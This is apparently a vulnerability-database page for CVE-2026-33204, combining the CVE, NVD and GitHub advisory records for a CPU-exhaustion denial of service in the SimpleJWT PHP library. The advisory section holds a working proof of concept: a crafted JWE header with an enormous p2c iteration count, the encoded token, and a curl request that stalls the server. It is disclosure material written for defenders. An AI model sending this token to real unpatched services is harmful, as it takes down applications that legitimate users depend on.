Vulnerability-Lookup

CVE-2026-33204 (GCVE-0-2026-33204)

Vulnerability from cvelistv5 – Published: 2026-03-20 22:37 – Updated: 2026-03-24 15:34

Title

SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering

Summary

SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/kelvinmo/simplejwt/security/ad…	x_refsource_CONFIRM
	https://github.com/kelvinmo/simplejwt/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	kelvinmo	simplejwt	Affected: < 1.1.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33204",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T15:33:43.475530Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T15:34:35.165Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "simplejwt",
          "vendor": "kelvinmo",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.1.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T22:37:13.411Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x"
        },
        {
          "name": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1"
        }
      ],
      "source": {
        "advisory": "GHSA-xw36-67f8-339x",
        "discovery": "UNKNOWN"
      },
      "title": "SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33204",
    "datePublished": "2026-03-20T22:37:13.411Z",
    "dateReserved": "2026-03-17T23:23:58.312Z",
    "dateUpdated": "2026-03-24T15:34:35.165Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33204\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T23:16:45.677\",\"lastModified\":\"2026-04-10T01:25:08.487\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.\"},{\"lang\":\"es\",\"value\":\"SimpleJWT es una sencilla biblioteca de tokens web JSON escrita en PHP. Antes de la versi\u00f3n 1.1.1, un atacante no autenticado puede realizar una denegaci\u00f3n de servicio mediante la manipulaci\u00f3n del encabezado JWE cuando se utilizan algoritmos PBES2. Las aplicaciones que llaman a JWE::decrypt() en JWEs controlados por el atacante utilizando algoritmos PBES2 se ven afectadas. Este problema ha sido parcheado en la versi\u00f3n 1.1.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kelvinmo:simplejwt:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.1.1\",\"matchCriteriaId\":\"FF560E9F-8D50-4B6F-84FF-B63FAB5BD2D0\"}]}]}],\"references\":[{\"url\":\"https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33204\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T15:33:43.475530Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T15:34:29.369Z\"}}], \"cna\": {\"title\": \"SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering\", \"source\": {\"advisory\": \"GHSA-xw36-67f8-339x\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kelvinmo\", \"product\": \"simplejwt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.1.1\"}]}], \"references\": [{\"url\": \"https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x\", \"name\": \"https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1\", \"name\": \"https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T22:37:13.411Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33204\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T15:34:35.165Z\", \"dateReserved\": \"2026-03-17T23:23:58.312Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T22:37:13.411Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33204

Vulnerability from fkie_nvd - Published: 2026-03-20 23:16 - Updated: 2026-04-10 01:25

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1	Product, Release Notes
	security-advisories@github.com	https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	kelvinmo	simplejwt	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kelvinmo:simplejwt:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF560E9F-8D50-4B6F-84FF-B63FAB5BD2D0",
              "versionEndExcluding": "1.1.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1."
    },
    {
      "lang": "es",
      "value": "SimpleJWT es una sencilla biblioteca de tokens web JSON escrita en PHP. Antes de la versi\u00f3n 1.1.1, un atacante no autenticado puede realizar una denegaci\u00f3n de servicio mediante la manipulaci\u00f3n del encabezado JWE cuando se utilizan algoritmos PBES2. Las aplicaciones que llaman a JWE::decrypt() en JWEs controlados por el atacante utilizando algoritmos PBES2 se ven afectadas. Este problema ha sido parcheado en la versi\u00f3n 1.1.1."
    }
  ],
  "id": "CVE-2026-33204",
  "lastModified": "2026-04-10T01:25:08.487",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T23:16:45.677",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-XW36-67F8-339X

Vulnerability from github – Published: 2026-03-18 20:16 – Updated: 2026-03-25 18:12

Summary

SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering

Details

Summary

An unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.
Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected.

Details

PHP version: PHP 8.4.11 SimpleJWT version: v1.1.0

The relevant portion of the vulnerable implementation is shown below (PBES2.php):

<?php
/* ... SNIP ... */
class PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {
    use AESKeyWrapTrait;

    /** @var array<string, mixed> $alg_params */
    static protected $alg_params = [
        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],
        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],
        'PBES2-HS512+A256KW' => ['hash' => 'sha512']
    ];

    /** @var truthy-string $hash_alg */
    protected $hash_alg;

    /** @var int $iterations */
    protected $iterations = 4096;

    /* ... SNIP ... */

    /**
     * Sets the number of iterations to use in PBKFD2 key generation.
     *
     * @param int $iterations number of iterations
     * @return void
     */
    public function setIterations(int $iterations) {
        $this->iterations = $iterations;
    }

    /* ... SNIP ... */

    /**
     * {@inheritdoc}
     */
    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {
        /** @var SymmetricKey $key */
        $key = $this->selectKey($keys, $kid);
        if ($key == null) {
            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);
        }
        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {
            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);
        }

        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);
        return $this->unwrapKey($encrypted_key, $derived_key, $headers);
    }

    /* ... SNIP ... */

    /**
     * @param array<string, mixed> $headers
     */
    private function generateKeyFromPassword(string $password, array $headers): string {
        $salt = $headers['alg'] . "\x00" . Util::base64url_decode($headers['p2s']);
        /** @var int<0, max> $length */
        $length = intdiv($this->getAESKWKeySize(), 8);

        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);
    }
}
?>

The security flaw lies in the lack of input validation when handling JWEs that uses PBES2.
A "sanity ceiling" is not set on the iteration count, which is the parameter known in the JWE specification as p2c (RFC7518).
The library calls decryptKey() with the untrusted input $headers which then use the PHP function hash_pbkdf2() with the user-supplied value $headers['p2c'].

This results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.
Because the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.

Proof of Concept

Spin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.

mkdir simplejwt-poc
cd simplejwt-poc
composer install
composer require kelvinmo/simplejwt
php -S localhost:8000

The content of index.php:

<?php

require __DIR__ . '/vendor/autoload.php';

$set = SimpleJWT\Keys\KeySet::createFromSecret('secret123');

$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$method = $_SERVER['REQUEST_METHOD'];

if ($uri === '/encrypt' && $method === 'GET') {
    // Note $headers['alg'] and $headers['enc'] are required
    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];
    $plaintext = 'This is the plaintext I want to encrypt.';
    $jwe = new SimpleJWT\JWE($headers, $plaintext);

    try {
        echo "Encrypted JWE: " . $jwe->encrypt($set);
    } catch (\RuntimeException $e) {
        echo $e;
    }
}

elseif ($uri === '/decrypt' && $method === 'GET') {
    try {
        $jwe = $_GET['s'];
        $jwe = SimpleJWT\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');
    } catch (SimpleJWT\InvalidTokenException $e) {
        echo $e;
    }
    echo $jwe->getHeader('alg') . "<br>";
    echo $jwe->getHeader('enc') . "<br>";
    echo $jwe->getPlaintext() . "<br>";
    }

else {
    http_response_code(404);
    echo "Route not found";
}

?>

We have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):

{
    "alg": "PBES2-HS256+A128KW",
    "enc": "A128CBC-HS256",
    "p2s": "blablabla",
    "p2c": 409123223136
}

The final JWE with poisoned header: eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla.

Notice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.

Perform the following request to the server (which tries to derive the PBES2 key):

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: localhost:8000' \
    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'

The request blocks the worker until the PHP execution timeout is reached, shutting down the server:

[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started
[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted

Fatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168

Impact

An attacker can send a crafted JWE with an extremely large p2c value to force the server to perform a very large number of PBKDF2 iterations.
This causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.
Repeated requests can exhaust server resources and make the application unavailable to legitimate users.

Credits

Edoardo Ottavianelli (@edoardottt)

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "kelvinmo/simplejwt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33204"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:16:59Z",
    "nvd_published_at": "2026-03-20T23:16:45Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.  \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n\u003c?php\n/* ... SNIP ... */\nclass PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {\n    use AESKeyWrapTrait;\n\n    /** @var array\u003cstring, mixed\u003e $alg_params */\n    static protected $alg_params = [\n        \u0027PBES2-HS256+A128KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha256\u0027],\n        \u0027PBES2-HS384+A192KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha384\u0027],\n        \u0027PBES2-HS512+A256KW\u0027 =\u003e [\u0027hash\u0027 =\u003e \u0027sha512\u0027]\n    ];\n\n    /** @var truthy-string $hash_alg */\n    protected $hash_alg;\n\n    /** @var int $iterations */\n    protected $iterations = 4096;\n    \n    /* ... SNIP ... */\n\n    /**\n     * Sets the number of iterations to use in PBKFD2 key generation.\n     *\n     * @param int $iterations number of iterations\n     * @return void\n     */\n    public function setIterations(int $iterations) {\n        $this-\u003eiterations = $iterations;\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * {@inheritdoc}\n     */\n    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n        /** @var SymmetricKey $key */\n        $key = $this-\u003eselectKey($keys, $kid);\n        if ($key == null) {\n            throw new CryptException(\u0027Key not found or is invalid\u0027, CryptException::KEY_NOT_FOUND_ERROR);\n        }\n        if (!isset($headers[\u0027p2s\u0027]) || !isset($headers[\u0027p2c\u0027])) {\n            throw new CryptException(\u0027p2s or p2c headers not set\u0027, CryptException::INVALID_DATA_ERROR);\n        }\n\n        $derived_key = $this-\u003egenerateKeyFromPassword($key-\u003etoBinary(), $headers);\n        return $this-\u003eunwrapKey($encrypted_key, $derived_key, $headers);\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * @param array\u003cstring, mixed\u003e $headers\n     */\n    private function generateKeyFromPassword(string $password, array $headers): string {\n        $salt = $headers[\u0027alg\u0027] . \"\\x00\" . Util::base64url_decode($headers[\u0027p2s\u0027]);\n        /** @var int\u003c0, max\u003e $length */\n        $length = intdiv($this-\u003egetAESKWKeySize(), 8);\n\n        return hash_pbkdf2($this-\u003ehash_alg, $password, $salt, $headers[\u0027p2c\u0027], $length, true);\n    }\n}\n?\u003e\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that uses PBES2.  \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)).  \nThe library calls `decryptKey()` with the untrusted input `$headers` which then use the PHP function `hash_pbkdf2()` with the user-supplied value `$headers[\u0027p2c\u0027]`.\n\nThis results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.  \nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n\u003c?php\n\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n$set = SimpleJWT\\Keys\\KeySet::createFromSecret(\u0027secret123\u0027);\n\n$uri = parse_url($_SERVER[\u0027REQUEST_URI\u0027], PHP_URL_PATH);\n$method = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\nif ($uri === \u0027/encrypt\u0027 \u0026\u0026 $method === \u0027GET\u0027) {\n    // Note $headers[\u0027alg\u0027] and $headers[\u0027enc\u0027] are required\n    $headers = [\u0027alg\u0027 =\u003e \u0027PBES2-HS256+A128KW\u0027, \u0027enc\u0027 =\u003e \u0027A256CBC-HS512\u0027];\n    $plaintext = \u0027This is the plaintext I want to encrypt.\u0027;\n    $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n    try {\n        echo \"Encrypted JWE: \" . $jwe-\u003eencrypt($set);\n    } catch (\\RuntimeException $e) {\n        echo $e;\n    }\n}\n\nelseif ($uri === \u0027/decrypt\u0027 \u0026\u0026 $method === \u0027GET\u0027) {\n    try {\n        $jwe = $_GET[\u0027s\u0027];\n        $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, \u0027PBES2-HS256+A128KW\u0027);\n    } catch (SimpleJWT\\InvalidTokenException $e) {\n        echo $e;\n    }\n    echo $jwe-\u003egetHeader(\u0027alg\u0027) . \"\u003cbr\u003e\";\n    echo $jwe-\u003egetHeader(\u0027enc\u0027) . \"\u003cbr\u003e\";\n    echo $jwe-\u003egetPlaintext() . \"\u003cbr\u003e\";\n    }\n\nelse {\n    http_response_code(404);\n    echo \"Route not found\";\n}\n\n?\u003e\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n    \"alg\": \"PBES2-HS256+A128KW\",\n    \"enc\": \"A128CBC-HS256\",\n    \"p2s\": \"blablabla\",\n    \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: localhost:8000\u0027 \\\n    $\u0027http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla\u0027\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations.  \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.  \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)",
  "id": "GHSA-xw36-67f8-339x",
  "modified": "2026-03-25T18:12:39Z",
  "published": "2026-03-18T20:16:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33204"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kelvinmo/simplejwt"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SimpleJWT has an Unauthenticated Denial of Service via JWE header tampering"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33204 (GCVE-0-2026-33204)

FKIE_CVE-2026-33204

GHSA-XW36-67F8-339X

Summary

Details

Proof of Concept

Impact

Credits

Tags

Sightings

Nomenclature